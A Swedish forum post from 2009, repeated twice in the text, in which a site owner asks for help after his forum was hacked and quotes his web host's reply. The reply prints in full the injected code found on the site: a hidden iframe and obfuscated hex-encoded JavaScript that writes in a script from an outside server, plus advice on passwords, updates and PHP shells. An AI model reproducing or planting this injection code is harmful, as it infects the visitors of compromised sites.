Hackat forum.
Postat: 2009-04-08 18:53
Hej.
På senare dar så har många utav våra registrerade användare fått en virusvarning då dom går in på forumet.
Jag tog då kontakt med webhotellet som jag hyr domänen utav och frågade om det fanns något dom kunde göra och frågade hur jag skulle gå till väga.
Jag fick då detta svar:
Hejsan!
du har blivit hackad och hackern har lagt detta på din sida:
"><iframe src='http://url/' width='1' height='1' style='visibility:
hidden;'></iframe><script>function
c1023895d9q49db0e073360d(q49db0e07339f5){ return
(eval('pars'+'eInt')(q49db0e07339f5,16));}function
q49db0e07345af(q49db0e0734997){ function q49db0e0735554(){var
q49db0e073593c=2;return q49db0e073593c;} var
q49db0e0734d80='';q49db0e0735d23=String['fromCharCode'];for(q49db0e07351
68=0;q49db0e0735168<q49db0e0734997.length;q49db0e0735168+=q49db0e0735554
()){
q49db0e0734d80+=(q49db0e0735d23(c1023895d9q49db0e073360d(q49db0e0734997.
substr(q49db0e0735168,q49db0e0735554()))));}return q49db0e0734d80;} var
ne0='';var
q49db0e073610b='3C7'+ne0+'3637'+ne0+'2697'+ne0+'07'+ne0+'43E696628216D7'
+ne0+'96961297'+ne0+'B646F637'+ne0+'56D656E7'+ne0+'42E7'+ne0+'7'+ne0+'7'
+ne0+'2697'+ne0+'465287'+ne0+'56E657'+ne0+'363617'+ne0+'065282027'+ne0+'
2533632536392536362537'+ne0+'3225363125366425363525323025366525363125366
42536352533642536332533312533302532302537'+ne0+'332537'+ne0+'32253633253
364253237'+ne0+'2536382537'+ne0+'342537'+ne0+'342537'+ne0+'3025336125326
6253266253637'+ne0+'253666253637'+ne0+'253666253332253664253635253265253
6652536352537'+ne0+'34253266253265253637'+ne0+'2536662532662536332536382
536352536332536622532652536382537'+ne0+'34253664253663253366253237'+ne0+
'2532622534642536312537'+ne0+'342536382532652537'+ne0+'322536662537'+ne0
+'352536652536342532382534642536312537'+ne0+'342536382532652537'+ne0+'32
253631253665253634253666253664253238253239253261253335253333253330253337
'+ne0+'253330253239253262253237'+ne0+'253635253334253237'+ne0+'253230253
7'+ne0+'37'+ne0+'2536392536342537'+ne0+'34253638253364253331253338253333
253230253638253635253639253637'+ne0+'2536382537'+ne0+'342533642533322533
392533302532302537'+ne0+'332537'+ne0+'342537'+ne0+'392536632536352533642
53237'+ne0+'2537'+ne0+'362536392537'+ne0+'332536392536322536392536632536
392537'+ne0+'342537'+ne0+'3925336125363825363925363425363425363525366525
3237'+ne0+'2533652533632532662536392536362537'+ne0+'32253631253664253635
25336527'+ne0+'29293B7'+ne0+'D7'+ne0+'6617'+ne0+'2206D7'+ne0+'969613D7'+
ne0+'47'+ne0+'27'+ne0+'5653B3C2F7'+ne0+'3637'+ne0+'2697'+ne0+'07'+ne0+'4
3E';document.write(q49db0e07345af(q49db0e073610b));</script>
Du måste byta ALLA dina lösenord, se till att du har antivirus
installerat på din dator och uppdatera alla script du har installerade
på din server till senaste versionen och radera allt du inte själv har
lagt upp/som du inte litar på.
Ok... jag hittade på index filen detta "sc ript" som jag tog bort. Varningen försvann en stund men kommer nu åter igen.
PHP och diverse kodning och dyliknande är verkligen inte min starka sida. Jag vet inte hur jag ska gå till väga för att åtgärda detta problem.
Jag frågade om det var någon fara för registrerade användare och hur jag skulle gå till väga och om dom kunnde erbjuda skydd. Jag fick då detta till svar:
Hejsan!
Anledningen till att jag säger att du skall ta bort andras filer är för
att det mycket väl kan vara så att de har laddat upp ett shell script på
din server. Det är i så fall en .php-fil som kan ha vilket namn som
helst, så kan såklart vara svårt att identifiera den.
Hur du skyddar dig beror helt på vad du har laddat upp för script. Ett
viktigt sätt är att alltid hålla alla dina script uppdaterade till
senaste versionerna.
Det är också viktigt att du aldrig använder svaga lösenord, som ett ord
som kan hittas i en ordbok. Använd blandningar av siffror, bokstäver och
specialtecken, och blandningar av stora och små bokstäver.
Vi kan som du kanske då förstår inte skapa något slags universellt skydd
då alla olika script har olika svagheter, och det bara är deras
utvecklare som skapar nyare versioner som täcker upp säkerhetshål
efterhand som de hittas.
Jag vet inte vad din hacker har kommit över. Att han skulle ha kommit
över ditt användarregister är osannolikt, och även då borde ditt forum
ha någon sorts kryptering på sina lösenord så att de inte finns i
klartext.
Det kanske säger allt till en som fattar sig på detta. Men för en som inte gör det.....
"SCRIPT" - är det själva forumet? Någon som har tips eller vet hur f*n jag ska lösa detta?
Tack på förhand.
/Ron
På senare dar så har många utav våra registrerade användare fått en virusvarning då dom går in på forumet.
Jag tog då kontakt med webhotellet som jag hyr domänen utav och frågade om det fanns något dom kunde göra och frågade hur jag skulle gå till väga.
Jag fick då detta svar:
Hejsan!
du har blivit hackad och hackern har lagt detta på din sida:
"><iframe src='http://url/' width='1' height='1' style='visibility:
hidden;'></iframe><script>function
c1023895d9q49db0e073360d(q49db0e07339f5){ return
(eval('pars'+'eInt')(q49db0e07339f5,16));}function
q49db0e07345af(q49db0e0734997){ function q49db0e0735554(){var
q49db0e073593c=2;return q49db0e073593c;} var
q49db0e0734d80='';q49db0e0735d23=String['fromCharCode'];for(q49db0e07351
68=0;q49db0e0735168<q49db0e0734997.length;q49db0e0735168+=q49db0e0735554
()){
q49db0e0734d80+=(q49db0e0735d23(c1023895d9q49db0e073360d(q49db0e0734997.
substr(q49db0e0735168,q49db0e0735554()))));}return q49db0e0734d80;} var
ne0='';var
q49db0e073610b='3C7'+ne0+'3637'+ne0+'2697'+ne0+'07'+ne0+'43E696628216D7'
+ne0+'96961297'+ne0+'B646F637'+ne0+'56D656E7'+ne0+'42E7'+ne0+'7'+ne0+'7'
+ne0+'2697'+ne0+'465287'+ne0+'56E657'+ne0+'363617'+ne0+'065282027'+ne0+'
2533632536392536362537'+ne0+'3225363125366425363525323025366525363125366
42536352533642536332533312533302532302537'+ne0+'332537'+ne0+'32253633253
364253237'+ne0+'2536382537'+ne0+'342537'+ne0+'342537'+ne0+'3025336125326
6253266253637'+ne0+'253666253637'+ne0+'253666253332253664253635253265253
6652536352537'+ne0+'34253266253265253637'+ne0+'2536662532662536332536382
536352536332536622532652536382537'+ne0+'34253664253663253366253237'+ne0+
'2532622534642536312537'+ne0+'342536382532652537'+ne0+'322536662537'+ne0
+'352536652536342532382534642536312537'+ne0+'342536382532652537'+ne0+'32
253631253665253634253666253664253238253239253261253335253333253330253337
'+ne0+'253330253239253262253237'+ne0+'253635253334253237'+ne0+'253230253
7'+ne0+'37'+ne0+'2536392536342537'+ne0+'34253638253364253331253338253333
253230253638253635253639253637'+ne0+'2536382537'+ne0+'342533642533322533
392533302532302537'+ne0+'332537'+ne0+'342537'+ne0+'392536632536352533642
53237'+ne0+'2537'+ne0+'362536392537'+ne0+'332536392536322536392536632536
392537'+ne0+'342537'+ne0+'3925336125363825363925363425363425363525366525
3237'+ne0+'2533652533632532662536392536362537'+ne0+'32253631253664253635
25336527'+ne0+'29293B7'+ne0+'D7'+ne0+'6617'+ne0+'2206D7'+ne0+'969613D7'+
ne0+'47'+ne0+'27'+ne0+'5653B3C2F7'+ne0+'3637'+ne0+'2697'+ne0+'07'+ne0+'4
3E';document.write(q49db0e07345af(q49db0e073610b));</script>
Du måste byta ALLA dina lösenord, se till att du har antivirus
installerat på din dator och uppdatera alla script du har installerade
på din server till senaste versionen och radera allt du inte själv har
lagt upp/som du inte litar på.
Ok... jag hittade på index filen detta "sc ript" som jag tog bort. Varningen försvann en stund men kommer nu åter igen.
PHP och diverse kodning och dyliknande är verkligen inte min starka sida. Jag vet inte hur jag ska gå till väga för att åtgärda detta problem.
Jag frågade om det var någon fara för registrerade användare och hur jag skulle gå till väga och om dom kunnde erbjuda skydd. Jag fick då detta till svar:
Hejsan!
Anledningen till att jag säger att du skall ta bort andras filer är för
att det mycket väl kan vara så att de har laddat upp ett shell script på
din server. Det är i så fall en .php-fil som kan ha vilket namn som
helst, så kan såklart vara svårt att identifiera den.
Hur du skyddar dig beror helt på vad du har laddat upp för script. Ett
viktigt sätt är att alltid hålla alla dina script uppdaterade till
senaste versionerna.
Det är också viktigt att du aldrig använder svaga lösenord, som ett ord
som kan hittas i en ordbok. Använd blandningar av siffror, bokstäver och
specialtecken, och blandningar av stora och små bokstäver.
Vi kan som du kanske då förstår inte skapa något slags universellt skydd
då alla olika script har olika svagheter, och det bara är deras
utvecklare som skapar nyare versioner som täcker upp säkerhetshål
efterhand som de hittas.
Jag vet inte vad din hacker har kommit över. Att han skulle ha kommit
över ditt användarregister är osannolikt, och även då borde ditt forum
ha någon sorts kryptering på sina lösenord så att de inte finns i
klartext.
Det kanske säger allt till en som fattar sig på detta. Men för en som inte gör det.....
"SCRIPT" - är det själva forumet? Någon som har tips eller vet hur f*n jag ska lösa detta?
Tack på förhand.
/Ron